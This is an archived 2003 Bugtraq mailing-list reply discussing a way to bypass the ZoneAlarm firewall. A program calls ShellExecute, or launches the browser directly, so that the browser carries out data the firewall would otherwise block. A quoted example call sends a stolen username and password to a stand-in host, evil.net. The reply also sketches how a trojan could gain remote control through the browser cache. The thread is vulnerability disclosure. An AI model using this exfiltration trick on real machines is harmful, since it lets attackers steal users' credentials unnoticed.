Re: Bypassing ZoneAlarm (limited)

From: Dan Harkless (bugtraqat_private)
Date: Thu Jul 03 2003 - 11:57:27 PDT

Next message: Ory Segal: "[Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability"

Previous message: Matt Zimmerman: "[SECURITY] [DSA-338-1] New x-face-el packages fix insecure temporary file creation"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

While I was being interviewed for an InfoSecurityMag.com article on this (in
which the author unfortunately got multiple fundamental facts wrong), I
thought of a couple of other points that are probably worth mentioning.

<acehat_private> writes:
> Windows dll shell32.dll exports a well known and documented function called
> ShellExecute. From Win32 Programmer's refference:
> 
> >HINSTANCE ShellExecute(
> >  HWND hwnd,	          // handle to parent window
> >  LPCTSTR lpOperation,    // pointer to string that specifies 
> >                          // operation to perform
> >  LPCTSTR lpFile,	  // pointer to filename or folder name string
> >  LPCTSTR lpParameters,	  // pointer to string that specifies 
> >                          //executable-file parameters 
> >  LPCTSTR lpDirectory,    // pointer to string that specifies default 
> directory
> >  INT nShowCmd            // whether file is shown when opened
> >  );
> 
> When the lpFile parameter is an Internet url, windows invokes Internet 
> Explorer (or more accurately - the default web browser), which in 99% of 
> the cases is allowed to access Internet, with that url. Example:
> 
> ShellExecute(
>   0,
>   "open",
>   "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
>   0,
>   0,
>   SW_HIDE //This doesn't work. 
>           //I think it is supposed to hide the window but ...
>   );

The level of detail you're going into on ShellExecute() kind of implies the
vulnerability is limited to that one system call, but of course a malicious
executable could directly run iexplore.exe or any other executable that
allows opening arbitrary URLs, and pass those URLs via the commandline or
via other means like DDE.

> The info leaked is limited by the maximum allowed url length, but that 
> could be more than enough for a malicious application to send some 
> username/password/cookie/cc_number info to malicious server.

And the vulnerability wouldn't be limited to simplex communications from
host to server.  The trojan could employ techniques (as simple as reading
Internet Explorer cache files) to establish half-duplex communications,
potentially allowing an attacker to gain remote control over your machine
despite the presence of ZoneAlarm.

Of course if a trojan is able to run arbitrary commands with your user
privileges (especially if you're in the Administrators group, as, for
instance, the initial account created on Windows XP boxes is), there are
other ways an attacker could gain control of your machine.  Particularly if
you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it
doesn't notice DLLs getting changed.

--
Dan Harkless
bugtraqat_private
http://harkless.org/dan/

Next message: Ory Segal: "[Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability"
Previous message: Matt Zimmerman: "[SECURITY] [DSA-338-1] New x-face-el packages fix insecure temporary file creation"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 07 2003 - 14:31:42 PDT